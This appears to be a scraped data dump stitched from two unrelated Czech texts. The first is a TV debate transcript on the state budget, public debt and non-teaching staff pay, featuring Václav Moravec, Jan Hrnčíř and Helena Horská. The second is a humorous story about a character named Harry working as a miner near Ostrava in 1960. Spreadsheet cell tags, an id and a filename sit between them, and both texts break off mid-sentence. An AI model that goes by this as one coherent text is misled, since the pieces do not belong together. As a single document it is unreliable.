místopředsedo, co by byla horší varianta? Rozpočtové provizorium nebo ten rozpočet, který vy kritizujete, jako i SPD , jako opozice a kam jste dali 35 pozměňovacích návrhů? Co je horší varianta rozpočtové provizorium nebo tento rozpočet? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Rozpočtové provizorium nikdy není dobře. Tam je důležité, jak dlouho by trvalo. Pokud by to rozpočtové provizorium tady bylo maximálně měsíc, tak se asi dá ten rozpočet nastavit jinak. Ale pravdou je, že to je pravidlo této vlády, že ten rozpočet se vždycky chystá takovým způsobem, že neodpovídá legislativě, že se tam dluhy schovávají do mimorozpočtových fondů. Když jsme to kritizovali i v tom loňském roce, tak vlastně nakonec i Eurostat i Český statický úřad přehodnotil ten schodek a říká, prostě ten schodek nebyl pod 300 miliard, a ten byl přes 300, jo. Takže když jsme si zvykli na to, že prostě pan ministr Stanjura připravuje rozpočet přesně tak, jak by se připravovat neměl. Jo? A když se podíváme na návrh rozpočtu na příští rok, tak samozřejmě nadhodnocené příjmy poměrně hodně a podhodnocené výdaje. Bylo naprosto jasné, že prostě když se tam zase nedají peníze na nepedagogické pracovníky ve školství nebo nelékařský personál ve zdravotnictví, takže to dopadne, jak to dopadlo letos, že z vládní rozpočtové rezervy se ty peníze tam musely nějak dolepit, protože ti ředitelé těch škol přece musí zaplatit ty lidi. Oni nemůžou říct, nemáme v rozpočtu peníze, tak choďte teď tři měsíce zadarmo. Takže oni to zas musí brát učitelům a tak dále. To znamená, přece takto se nedá dělat ani reforma školství tímto způsobem a rozhodně ne přes státní rozpočet. Takže nic není připraveno… Moderátor Václav Moravec : A dá se přes státní rozpočet, když o tom mluvíte, protože jeden z těch sto třinácti pozměňovacích návrhů je i ten váš, tady jsem si ho vybarvil. Je to 35 miliard, které chcete přesunout z odvodů do rozpočtu Evropské unie na vládní rozpočtovou rezervu, respektive právě chcete, aby ty peníze z vládní rozpočtové rezervy šly na kompenzace poplatků za obnovitelné zdroje a růst cen regulované složky elektřiny pro domácnosti a firmy a na zvýšení platů nepedagogických pracovníků ve školství a nelékařských pracovníků ve zdravotnictví. To znamená, vy jste si vědom toho, že tím by Česká republika přestala plnit své závazky, pokud by tento váš pozměňovací návrh prošel? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Tak já jsem vlastně chtěl říct, že prostě my tady máme důležitější problémy, které je potřeba řešit, že nám chybí právě peníze na ty nepedagogické pracovníky nebo nelékařský personál. Stejně tak jako že už domácnosti a firmy platí ty odvody za ty obnovitelné zdroje v maximální zákonné výši vlastně. Dneska už platíte těch šest stovek, nebo přes šest stovek za MWh. To znamená, to jsou, to jsou peníze, které prostě zdražují domácnostem i firmám ty energie. A my říkáme, prostě je to špatně, my potřebujeme ty peníze tady. A teď už jsou schváleny parametry rozpočtu, takže… Moderátor Václav Moravec : A vy jste si, promiňte, ale vy jste si vědom… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: … už se s tím nedá moc jiného dělat. Moderátor Václav Moravec : … toho, že to je nerealistický návrh, protože by, pokud by Česká republika přestala platit své závazky vůči Evropské unii , tak by o daleko větší peníze z Evropské unie přišla. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: To je otázka… Moderátor Václav Moravec : No, to je otázka jasná, je na ní odpověď. Ano. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: … to je otázka o jaké peníze by přišla. Protože právě díky unijním regulacím zase hodně platíme, že jo. Ty obnovitelné zdroje, to je nařízení Evropské unie . A my už jsme zaplatili přes 800 miliard za ty obnovitelné zdroje na energiích navíc. A za tyto peníze, kdybychom stavěli třeba spolehlivé zdroje energie, jako, jako jsou jaderné bloky, tak by to bylo efektivnější než tyto fotovoltaiky. Protože ty peníze stejně odtečou do různých daňových rájů a tak dále. Takže prostě je to neefektivní. A my chceme ukázat tímto způsobem, že se to dá dělat i jinak. Moderátor Václav Moravec : Ty nepedagogické pracovníky o tom už jsme se tady bavili na konci té první části dnešních Otázek. A Markéta Pekarová Adamová ujistila, že je v koalici shoda, že Starostové podpoří rozpočet na příští rok. A že projde rozpočtové určení daní, které má alokovat obcím a městům peníze právě na nepedagogické pracovníky v tom příštím roce. Vy podpoříte jako SPD ten návrh o rozpočtovém určení daní, přes které by ty peníze natekly? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Uvidíme, co bude nakonec předloženo. My jsme podporovali tu změnu rozpočtového určení daní pro ty kraje především, protože opravdu 20 let se neřešily, neřešily vlastně kraje. A ty peníze, které tam tečou do těch krajů podle parametrů před 20 lety, tak už dneska neodpovídají realitě. Přesuny obyvatel, rozšíření silnic druhé a třetí třídy, zdravotní záchranné služby, další školská zařízení, střední školy a tohle. Takže třeba konkrétní Jihomoravský kraj, ze kterého já pocházím, tak byl velmi bitý, když to vezmeme z přepočtu na hlavu, že dostával opravdu výrazně míň než třeba jiné kraje, jako třeba Jihočeský a podobně. Takže ano, my jsme říkali, ty parametry jsou změněny dobrým směrem, to dává smysl. A teď je otázka, jestli se mají převádět platby tady za ten personál, nepedagogické pracovníky, tímhle způsobem ty obce. Já nevím, jestli je to úplně potřeba. Já si myslím, že historicky to bylo placeno přes kapitolu ministerstva školství. Já si myslím, že s tím nebyl žádný problém. Ale jako… Moderátor Václav Moravec : No, ve výši odměňování. Ptám se vás proto, že by ty peníze věděly ty obce, že by je měly pravidelně a ne ta každoroční přetahovaná, pokud to jde přes ministerstvo školství, jestli na ně zbydou peníze nebo ne. Já se vás ptám na to systematické řešení, protože nepedagogičtí pracovníci jsou biti, na rozdíl od pedagogických pracovníků, kteří mají v zákoně 130 %… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Ale oni jsou, oni jsou biti jenom proto, že tato vládní koalice s tím dělá takové kejkle. Tady nikdy nebyl problém, vždycky ty peníze se rozpočtovaly, jestliže prostě ti pracovníci v tom školství jsou a jsou tam samozřejmě potřeba, tak je potřeba jim dát peníze. A tato vládní koalice začala dělat to, že ty peníze tam přestala dávat a začala mluvit o tom - no, bylo by lepší, kdyby to platili zřizovatelé, kdyby je platily obce, města, kraje a podobně. A začaly ty peníze stahovat. Jo? To znamená, to je teď prostě dáno touto vládní koalicí. Ten problém tady nikdy nebyl. A kdyby tohle nedělali, tak to, tak by samozřejmě ten problém nevznikl. Moderátor Václav Moravec : Ano,… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : A já bych jenom reagovala. Jednak za prvé, myslím si, a to tady budu zdůrazňovat, zákon o státním rozpočtu by měl reflektovat platnou legislativu, včetně našich platných závazků, což jsou také příspěvky do Evropské unie a ty stejně tak příspěvky do NATO . Další komentář, to se týká financování nepedagogických pracovníků. Tato vláda je často kritizována, že nedělá tak radikální, ambiciózní reformy, jak by měla. A když už teda nějaké kroky, alespoň řekněme nějaké, můžeme říct i polovičaté nebo alespoň částečné, dělá, tak už je zase kritizována, že něco mění. Já si myslím, že co se týká financování nepedagogických pracovníků, tak mi nepřijde logické, že ze státního rozpočtu se financují nepedagogičtí pracovníci, o jejichž počtu vlastně ani stát nerozhoduje a rozhoduje se na úrovni obcí. Za mě by mělo být dodrženo pravidlo, pokud rozhoduji o počtu a o objemu nějaké činnosti, tak by to mělo být placeno z mého rozpočtu. Takže dostát vlastně to rozhodování… Moderátor Václav Moravec : Tedy vnímáte to jako systémovou věc, že… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Systémovou věc, která je potřeba udělat. Moderátor Václav Moravec : … přes rozpočtové určení daní. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : To, že se to možná dělá na poslední chvíli, možná pět minut po dvanácté, opět se zase mění legislativní prostředí v době, kdy už bychom měli mít připravený státní rozpočet, který bude založen na takovéto schválené legislativní změně. S tím souhlasím, z toho také nadšená nejsem. Ale nekritizovala bych vládu za snahu rozhodovat a vracet rozhodování a také samozřejmě i financování do míst, kde se o těch místech opravdu rozhoduje. Ať je to spojené, rozhodují, ale platím z vlastního rozpočtu. Moderátor Václav Moravec : Ono i v souvislosti s tím rozpočtem, jsme u posledního státního rozpočtu pro rok, kdy bude vládnout vláda v tomto složení vzešlá z voleb roku 2021. Ta vláda se označila za vládu rozpočtové odpovědnosti. Když se podíváme na veřejné zadlužení České republiky , tak vloni činilo více než 42 procent hrubého domácího produktu. Ještě v roce 2019, jak už sami vidíte na následujícím grafu, to bylo 29,6 procenta. Přes 40 procent HDP se veřejný dluh dostal v roce 2021. Připomínám, že šlo o covidový rok. O rok později činil už 42,5 procenta. Podle predikce ministerstva financí by letos měl dosáhnout skoro 44 procent HDP a příští rok bezmála 45 procent HDP. Připomínám, že dluhová brzda, která je součástí zákona o rozpočtové odpovědnosti, je 55 %. To znamená, příští rok se ten státní rozpočet, o kterém se bavíme a který příští týden bude v závěrečném čtení schvalovat Poslanecká sněmovna , tak jsme na deseti procentní vatě, tak říkajíc, nebo deseti procentní možnosti, kdy narazíme na dluhovou brzdu. To není příliš dobrý výsledek vlády rozpočtové odpovědnosti, Heleno Horská, není-liž pravda. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Dluhy se tvoří v minulosti, dluhy se netvoří a v aktuálním období. To, co bych chtěla zdůraznit, je, že za této vlády, a já tu budu poměřovat růst dluhu ve vztahu k nominální veličině, jako je hrubý domácí produkt, tedy k velikosti ekonomiky. Tak za této vlády se nejspíš veřejné zadlužení, tedy zadlužení všech veřejných institucí, zvýší o pět procentních bodů, ve velikosti ekonomiky. A za předchozí vlády to bylo devět procent. Takže za mě ano, z hlediska korunového vyjádření ten dluh roste velmi rychle, roste ke čtyřem bilionům korun. Je to velmi vysoká suma, nicméně z hlediska velikosti ekonomiky a také s ohledem na zvýšenou cenovou hladinu ten nárůst dluhu v těch relativních veličinách není tak agresivní. To, že bych si uměla představit ambicióznější konsolidaci, konsolidaci, která bude více rovnoměrně rozprostřená na stranu příjmů a také i víc trochu na stranu výdajů, to znamená alespoň z poloviny výdaje, z poloviny příjmy. To je pravda. Konsolidaci ale tady máme, protože když se podíváme na to, jak zpomaluje nárůst dluhu, tak dochází k tomu. Ono totiž to, co se často uvádí, je, že kdyby tady byl autopilot, tak by rozpočty byly v nižším schodku, což vůbec není pravda. Kdybychom totiž nastavili autopilota v současném stavu našich veřejných rozpočtů. Tak se dostaneme automaticky ke schodkům 300 až 400 miliard korun. Tak je nastaven autopilot. Jinými slovy, česká populace letí v letadle, kterému dochází pohon, dochází mu vlastně letecké palivo. A ten autopilot se snaží jenom zbrzdit ten sekles, ten pokles toho letadla dolů. Pokud chceme, aby schodky byly nižší, my musíme tu ekonomiku, to letadlo znovu a doplnit mu palivo, zajistit, aby ta ekonomika rostla, generovala zdroje, podívat se na všechny strukturální změny, která tato ekonomika potřebuje. Snaha aspoň nějaká, co se týká důchodové reformy, nějakou snahu tady vidíme zflexibilnění trhu práce. Budeme se bavit a velmi brzy to budeme muset otevřít, zdravotnictví. Neustále se bavíme o školství. To znamená ve školství to moderní ekonomiku, která bude více opírat se o přidanou hodnotu, o vědu a výzkum, prostě nepostavíme. Takže tohle všechno stojí před námi. Moderátor Václav Moravec : Jinými slovy, pokud k těmto změnám nedojde, shodnete se oba na tom, protože SPD má v programu, který jsem si v tomto týdnu znovu pročítal, vyrovnaný státní rozpočet. Pokud k těmto změnám nedojde, může dojít k vyrovnanému, k sestavení vyrovnaného státního rozpočtu? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Tak já souhlasím. Souhlasím akorát s tím, že není jediná cesta, jak řešit veřejné finance, buď zvyšovat dluhy, nebo zvyšovat daně. Já si myslím, že právě se musíme zaměřit na ten hospodářský růst, který prostě tady s touto vládou není. To si myslím, že je ten klíčový problém. A teď je samozřejmě otázkou, jak to udělat, protože naše ekonomika je v takové docela složité situaci, kdy zpravidla fungujeme jako subdodavatelé, že jo, těm mateřským organizacím v zahraničí. To je, to není do značné míry otázka, tak jak byste to chtěli nasměrovat. A druhý problém samozřejmě, který tady máme a ten má, ten má samozřejmě celá Evropská unie. Že si, že si prostě stanovila podle mého názoru nerealistické zelené cíle, které prostě chce dosáhnout za cenu toho, že vlastně ten průmysl, který tady máme, a my, Česká republika patříme k nejprůmyslovější zemi vůbec Evropy , tak že prostě se tento průmysl uměle, těmi umělými regulacemi zničíme. Ne, že by, ne, že by nebyl schopen konkurovat nebo dodávat, dodávat výrobky a služby, o které by nebyl zájem. To není pravda. Zájem je, ale my to přesuneme jinam, přesuneme to do Turecka , do Asie . My to budeme vozit tam, kde to vyrobí prostě, řekněme s ekologickými limity, o kterých se tady nemůžeme vůbec bavit. A budeme tady se orientovat na tu novou ekonomiku, tu inovativní. A já si myslím, že takto to nefunguje. Moderátor Václav Moravec : A kdy je reálné, abychom tedy měli vyrovnaný rozpočet? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: To znamená, ten… Moderátor Václav Moravec : … jako místopředsedy sněmovny… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Mně vadí to, že tato vláda rozpočtové odpovědnosti, jak jste říkal, tak vlastně ona, ona se vydala tím směrem, že rezignovala na hospodářský růst, to jí v podstatě nezajímá. A tím, jak řešila energie, to bylo naprosto jasné, že jí to nezajímá. A šla cestou zvyšování daní. Takže ona plošně zvýšila daně v tom daňovém balíčku, v letošním roce je to nějakých 80 miliard do rozpočtu navíc zvýšených daní. Ale ani o tuto částku nebyla schopna konsolidovat. To znamená, to snížení schodku je výrazně nižší, výrazně nižší, /nesrozumitelné/ nových daních. Moderátor Václav Moravec : Ale vy do toho započítávat do těch 80 miliard hlavně windfall tax, kde jsou ale i odvody, kde jsou i odvody v rámci těch státních podniků, respektive na akciích, ne? Protože by se zvýšil o 80 miliard… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Tam je… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Já jenom, jestli mohu doplnit čísla… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Ano, windfall tax, to je zavedená nová daň, která tady dřív nebyla, jo? A není kompenzováno ničím, jo? Takže to také… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Protože tady se často mluví o zvyšování daní, které je, ano, v některých oblastech se zvyšovaly daně, některé spotřební daně, některé položky daně z příjmů právnických osob, to je ta windfall tax. Některé úpravy z daně příjmu fyzických osob. Ale když se podíváte na statistiku, a to jak Eurostatu nebo fiskální výhled z ministerstva financí, tak zjistíte, že tzv. složená daňová kvóta, to znamená objem vybraných daní a odvodů vůči velikosti ekonomik dokonce nepatrně poklesl. To znamená, nemůžeme tady tvrdit… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Vzrostla na 34 %… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : …, že došlo ke zvýšení daňové zátěže, protože došlo k takové tzv. restrukturalizaci toho daňového mixu. Další pointa, nevytvářejme naději, že pouhé oživení růstu české ekonomiky zaplní tu díru ve veřejných rozpočtech, které máme. Bohužel mám tu smutnou zprávu, nebude to stačit. To znamená, i kdybychom restartovali růst české ekonomiky, navrátili ho na úrovni okolo dvou a půl, tří procent, což je docela hezký růst, tak stále ten strukturální schodek máte na úrovni sice ne teďka, jako býval za předchozí vlády, 3,3 procenta, ale pořád je okolo dvou procent. Takže pořád tam máme schodek… Moderátor Václav Moravec : I kdyby byl 2,5 procentní růst, tak stále bude… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : … růst, tak máme schodek minus 2,1 procenta. Nominální hodnota, to je teďka minus 160 miliard korun. Jo? Moderátor Václav Moravec : I kdyby byl 2,5 %? Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : I kdyby byl 2,5 procentní růst… Moderátor Václav Moravec : 160 miliard… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : … máme přes dvě procenta strukturální schodek. V současných nominálních cenách, to je zhruba 160 miliard korun. To je ten autopilot, o kterém mluvím. A chceme-li tohoto autopilota zastavit a převzít tu kontrolu nad veřejnými rozpočty do vlastních rukou, musíme sahat do výdajových složek. A to jsou ty reformy. A to jsou ty reformy, ve kterých vy se v Poslanecké sněmovně nejste schopní shodnout. Populace NATO vlastně také, vlastně když slyší tu neshodu, tak vlastně není nakoupena pro to, aby ty často bolestivé reformy akceptovala, nikdo jí to pořádně nevysvětlí. Když už jí to někdo vysvětlí, tak druhá strana začne zpochybňovat vůbec tu potřebu strukturálních reforem. A my se teďka v tom jaksi motáme dokola, protože jedna část populace věří, že změny není potřeba udělat, že tady máme rychlé recepty. Stačí najít někde na růst. Nebo tady stačí lépe vybírat daně. Ani to jedno nepomůže. Prostě opravdu bez radikálních strukturálních reforem nejsme schopni vrátit veřejné rozpočty k nule. A bude-li předchozí, bude-li následující vláda usilovat o opravdu fiskální konsolidaci, tak bez dalších reforem se budou pořád ty schodky držet okolo dvou set až tři sta miliard korun, když nebude nic dělat. A nevím, jestli si to současná opozice vůbec uvědomuje. Moderátor Václav Moravec : Tady mi dovolte, abych, protože záhy navážu na ta vaše slova, ale když premiér Petr Fiala tento týden bilancoval, co se jeho vládě za tři roky povedlo, splněno nebo rozpracováno víc než z poloviny je podle Fialy 93 procent cílů z programového prohlášení. Některé sliby ale vláda už podle něj nesplní. Petr Fiala / ODS /, premiér, předseda strany, 28.11.2024: Jedna z těch mých priorit splněna nebyla a nebude, ale má to objektivní důvody, které jsou nepřekonatelné. A to bylo, že jsem chtěl, abychom zavedli legislativní daňovou brzdu, ale abychom mohli zavést účinnou legislativní daňovou brzdu, tak bychom potřebovali ústavní většinu a ústavní většinu nemáme. A nemáme partnery na to, kteří by takovýto náš cíl pomohli, pomohli naplnit. Moderátor Václav Moravec : Připomínám, že vytvoření daňové brzdy bylo v programovém prohlášení vlády, Fialovy vlády z ledna 2022, kde bylo - vytvoříme pravidlo daňové brzdy, které stanoví strop daňového břemene. Jakmile jej složená daňová kvóta dosáhne, zvyšování daní bude automaticky vyloučené, konec citátu. Tento bod ale v aktualizovaném programovém prohlášení, které je před námi, z března 2023, už není. V obou verzích je ale tento bod - budeme usilovat o zahrnutí zákona o pravidlech rozpočtové odpovědnosti, v případě jeho části, do ústavního pořádku. To se nepovedlo. Bohužel nebo bohudík, Jane Hrnčíři? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR:¨ Já právě jsem poslouchal paní kolegyni a samozřejmě, že jenom hospodářský růst, ani kdyby byl na úrovni pěti procent, co jsme tady taky před COVIDem zažili, pár let… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : To už je za námi. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: To už je, to už je za námi. Takže to nás nespasí. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Bohužel. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: A je potřeba samozřejmě snižovat ten schodek. Ale vláda slibovala ve svém programovém prohlášení, že bude snižovat o jedno procento strukturální schodek. To samozřejmě to se neděje. Takže je to ruku v ruce. A tato vláda žádné reformy ale v podstatě neudělala, vždyť žádné reformy nepředstavila. Tady není, nejsme tady v situaci, kdy bychom se tady bavili… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Změna v parametru bodového systému. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: … o nějakých reformách. Ano, zmrzačila, zmrzačila důchodový systém. To je pravda. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Změna sociálních dávek. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: To ještě, to jsou věci, o kterých se mluví, které se nějakým způsobem projednávají. Všechno to není dotažené samozřejmě. To zmrzačení důchodu, ano. To samozřejmě došlo, ale tak my na to máme trošičku jiný názor. Navíc není úplně zřejmé, jak to za těch 30, 30 let tady vůbec bude vypadat, jak bude tady vypadat, já nevím, robotizace a další věci, jak se tady bude pracovat. To je samozřejmě věc jiná. Moderátor Václav Moravec : Promiňte, pokud byste mi oba měli odpovědět na tu otázku, jestli by se Poslanecká sněmovna , politická reprezentace chovala odpovědněji, pokud by součástí ústavního pořádku byla právě pravidla rozpočtové odpovědnosti a dluhová brzda? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Tak dluhová brzda je dobrá věc. Akorát teď třeba Německo s tím má trošku problém, které má tu dluhovou brzdu nastavenou tak nízko, že když pak potřebují v době nějaké krize nakopnout ekonomiku, tak díky té dluhové brzdě do toho nemůžou sáhnout. Takže pokud se rozumně nastaví, tak samozřejmě ano. Ale ještě jednu věc. Moderátor Václav Moravec : Měla by být součástí ústavního pořádku z vašeho pohledu? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Já si myslím, že ano. Tato vláda akorát nám slibovala, že bude digitalizovat agendy, že zlevní stát, ale to se taky nestalo. Vždyť nárůst počtu státních zaměstnanců o 20 tisíc za dobu této vlády… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Ale kde, musíte říct kde, nejsou to státní… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: To je jedno, to je jedno, ale ten stát, ten stát bobtná. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : … úředníci, ale jsou to zaměstnanci státu. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: … ten stát bobtná… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Jsou to regionální školství. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Nejenom, ale ten stát bobtná. To znamená digitalizace, ta se nezvládla, utratila se spousta peněz, vznikla digitální informační agentura, která už dneska chce tři miliardy spolykat ze státního rozpočtu. A jaký je výsledek? Nula. Máme nějaké digitální občanky, které fungují jenom v České republice , ale v Evropské unii jsou nepoužitelné. A digitální stavební řízení, to dopadlo naprostým fiaskem. To znamená, tato vláda prostě to, co slibovala, nepředstavila. Já nevím, kde pan premiér bere tu drzost a říkat, že 93 % je splněno. Vždyť to je směšné. Moderátor Václav Moravec : Proč se, proč se vám jako politikům nechce do toho, o čem nejnověji i v tomto týdnu opět se zmínil Mezinárodní měnový fond ? Že způsob daní v České republice , když se podíváme na průměr Evropské unie , zkrátka nevychází, abychom měli vyrovnané veřejné finance. Proč jako politici, je to jenom z toho důvodu, že to je populární vůči veřejnosti, nechcete jít do změn daňového systému a zvýšit daňové výnosy? Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: To je samozřejmě otázka. U nás… Moderátor Václav Moravec : Četl jste… Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: … u nás není, něco jsem v médiích zaznamenal. Ale když se podíváme, my tady máme jinou strukturu trošku. My tady máme vysoké odvody sociálního a zdravotního pojištění, které třeba jinde jsou nižší, zase mají třeba vyšší přímé daně. My jsme šli touto cestou. Ale to zdanění, třeba zdanění práce, jak máme nastaveno, tady nemáme nějak absurdně nízké, i jako ve srovnání zemí OECD , … Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Naopak právě Mezinárodní měnový fond kritizuje, výši odvodů v České republice . Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: … že máme právě poměrně vysoké. To znamená, já chci, já chci říct právě, ano, já chci doplnit to B, proto jsme i schválili vlastně zrušení té superhrubé mzdy, abychom to nějakým způsobem kompenzovali před těmi čtyřmi lety, když jsme o tom hlasovali. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : A to si protiřečíte s doporučením Mezinárodního měnového fondu . Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Ne, abychom toto vylepšili, protože to se často kritizuje, že vlastně došlo k zrušení superhrubé mzdy a tím se stát připravil o peníze a tak dále. Ale my jsme prostě chtěli, aby zůstalo víc peněz v peněženkách těch pracovníků, protože to zdanění práce u nás bylo vysoké, takže jsme to tímto způsobem kompenzovali. Moderátor Václav Moravec : Z těch doporučení Mezinárodního měnového fondu . Co podle vás bude muset příští politická reprezentace, ať bude jakákoli, muset naplnit? Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Mezinárodní měnový fond právě zmiňuje zrušení superhrubé mzdy jako jeden z faktorů, proč také ten stav veřejných rozpočtů je takový, jaký máme. A prá</t>
  </si>
  <si>
    <t>75370</t>
  </si>
  <si>
    <t>20241201_115_3476878903_27230e7ed8cfaf5b34dc.html</t>
  </si>
  <si>
    <t>27230e7ed8cfaf5b34dc</t>
  </si>
  <si>
    <t>Harry jako horník a poté jako popel v urně</t>
  </si>
  <si>
    <t>Harry jako horník a poté jako popel v urně První 1960 a druhé 2024. Na Ostravsku je všechno jinak. Už první den vlekli Harryho jeho noví spolupracovníci do výtahu. Když tu klec před sebou viděl, zašprajcoval se jako vůl před porážkou. Po rozjetí klece začal lamentovat, že má strach ze tmy. „Udělejte tady vokna, nebo vomdlím,“ prosil. Když dorazili bezpečně dolů k cíli, byl tak šťastný, že tu první šichtu rubal jako šílený a pak šest neděl marodil. Poslední den neschopnosti využil k návštěvě ředitele podniku. Oznámil mu, že už dolů fárat nemůže, celý se v té kleci třese strachy, jestli by ho soudruh ředitel nemohl zaměstnat na povrchu, třeba v kantýně. „Nepřipadá v úvahu, byl jste přece voják, člověče!“ Zlatá Kraví hora a muničák, pomyslel bývalý tankista. Po té první zkušenosti si síly rozložil a podle vlastní domněnky musel stejně v rubání porazit šestinásobného hrdinu práce Jaroslava Misku, úderníka vyznamenaného Řádem práce, který je považován za druhého nejlepšího stachanovce hned za ruským bohatýrem v této branži na Doněcku . Harry předvídal, že později, po kariéře rubače, určitě Jaroslava Misku udělají ředitelem a že pak půjde z nynějších 80 kilogramů na 130 a může se pak, tak akorát, stát přeborníkem v rubání alkoholu . To by si to s ním Harry mohl ale už v pohodě rozdat a sesadit ho z trůnu. Ta doba byla ale daleko. Na hlavu je denní norma 130 kubíků, Harry šetřil své tělo na příjemnější záležitosti a udělal 20 kubíčků. Vymlouval se, že mu neustále zhasíná karbidka a zapalování lampy, že ho zdržuje od překonávání nejlepšího rubače Misky. Ostravští chachaři se tomu smáli půl šichty, takže i oni byli tento den od rekordů daleko a nesplnili normu. Druhý den chytla Harrymu nohavice a chachaři měli co hasit. Harry z nich byl nejvíc zaprášený a umoněný, ale ruce měl ještě stále bez mozolů. Bezúspěšně se snažil přemluvit své spolubaňaře, jestli by mu denně každý nenapsal 10 procent ze svého, že jim za to bude celou šichtu zpívat sprosté písně a bavit je hubou i jinými věcmi. Řekli mu, že není ani trochu ganc hlupy synek. „Do pěruna cholera, tady se musí fachčit,“ slyšel ustavičně. Zjistil, že Ostraváci mají ve větě dost německých výrazů, každý z nich že by si s onou Vídeňačkou rozuměl líp než on sám, zavzpomínal. Že mu zhasíná lampa, dali Harrymu přilbu s karbidkou, nasadil si ji obráceně, takže stejně nic neviděl a nadále nemohl trhat rekordy. Nejlepšími kamarády se mu staly důlní myši a nejhorší pro něj byl smrad, který vznikal při velkostranění rubačů ve štole. Po krátkém čase odešel na vlastní žádost. Ředitel mu na rozloučenou položil otázku, jestli ví, jaký je rozdíl mezi jím a dřevem, sám rychle napojil odpověď: „Dřevo aspoň pracuje!“ Harry nastoupil na Moravě v Bedihošti. Okopával brambory a vypracoval se až na hlídače hus a natěrače vesnických dívek. Po příchodu do JZD požádal okamžitě o zálohu 200 korun, které hned uložil v tamější hospopdě. Pak se zamiloval do děvčete, vážilo 135 kilo, jmenuje se Alenka Zahradníková a bydlí v zahradní ulici. Líbila se mu shoda jména s názvem ulice. „Má dívka Alena má tu výhodu,“ říkával zasvěceně, „že nepotřebuju žádný polštář ani přikrývku, jednou už jsem se mohl udusit, když jsem usnul pod jejím ňadrem, ještě že z něho nevytékalo mlíko... to by byl pivaře konec...“ V této obci je také kulturní dům, pořádající taneční zábavy. Harry navázal kontakt s kapelou a zpíval tam španělsky a anglicky, aniž tyto řeči ovládal. Text měl proto napsaný na papírku. Později tvrdil, že jeho vystoupení byla tak horlivá, že zjistil po skončení se zpěvem, že je v sále sám. To měl z toho, že při procítěném zpěvu zavíral oči. Druhý den se z nástěnky dozvěděl, že prý je lump a ožralka a že blbne hlavy nejen holkám, ale i stařenkám. Donutilo ho to tiše opustit Bedihošť u Prostějova . Své dívce neudal pravé jméno – to znal jen předseda -, pro ni a ostatní byl Čambalini, jeden z nejlepších kytaristů Španělska , který v jejich JZD je jen na exkurzi. Zem se po něm slehla. Kráčel k západní hranici opět bez haléře a hladový. Měl štěstí, že jeho směrem jel traktor, 10 kilometrů ho svezl. Poté opět kilometry ukrajoval chůzí, překážkou mu jsou hospody a kuchařky v nich. Živí se výpomocnými pracemi – štípat dříví, podojit a přidržet kozy a podobně. Po čtrnáctidenní chůzi došel před Soběslav a vysílením tam usnul pod dubem. Zdálo se mu, že je to dub, pod kterým usul i Žižka. Harry byl po požití dvou kil hrášku a šesti piv . Myslel, že mu hrozí exploze břicha. U Chotěboři se při konání potřeby zvedl tak silný vítr, že 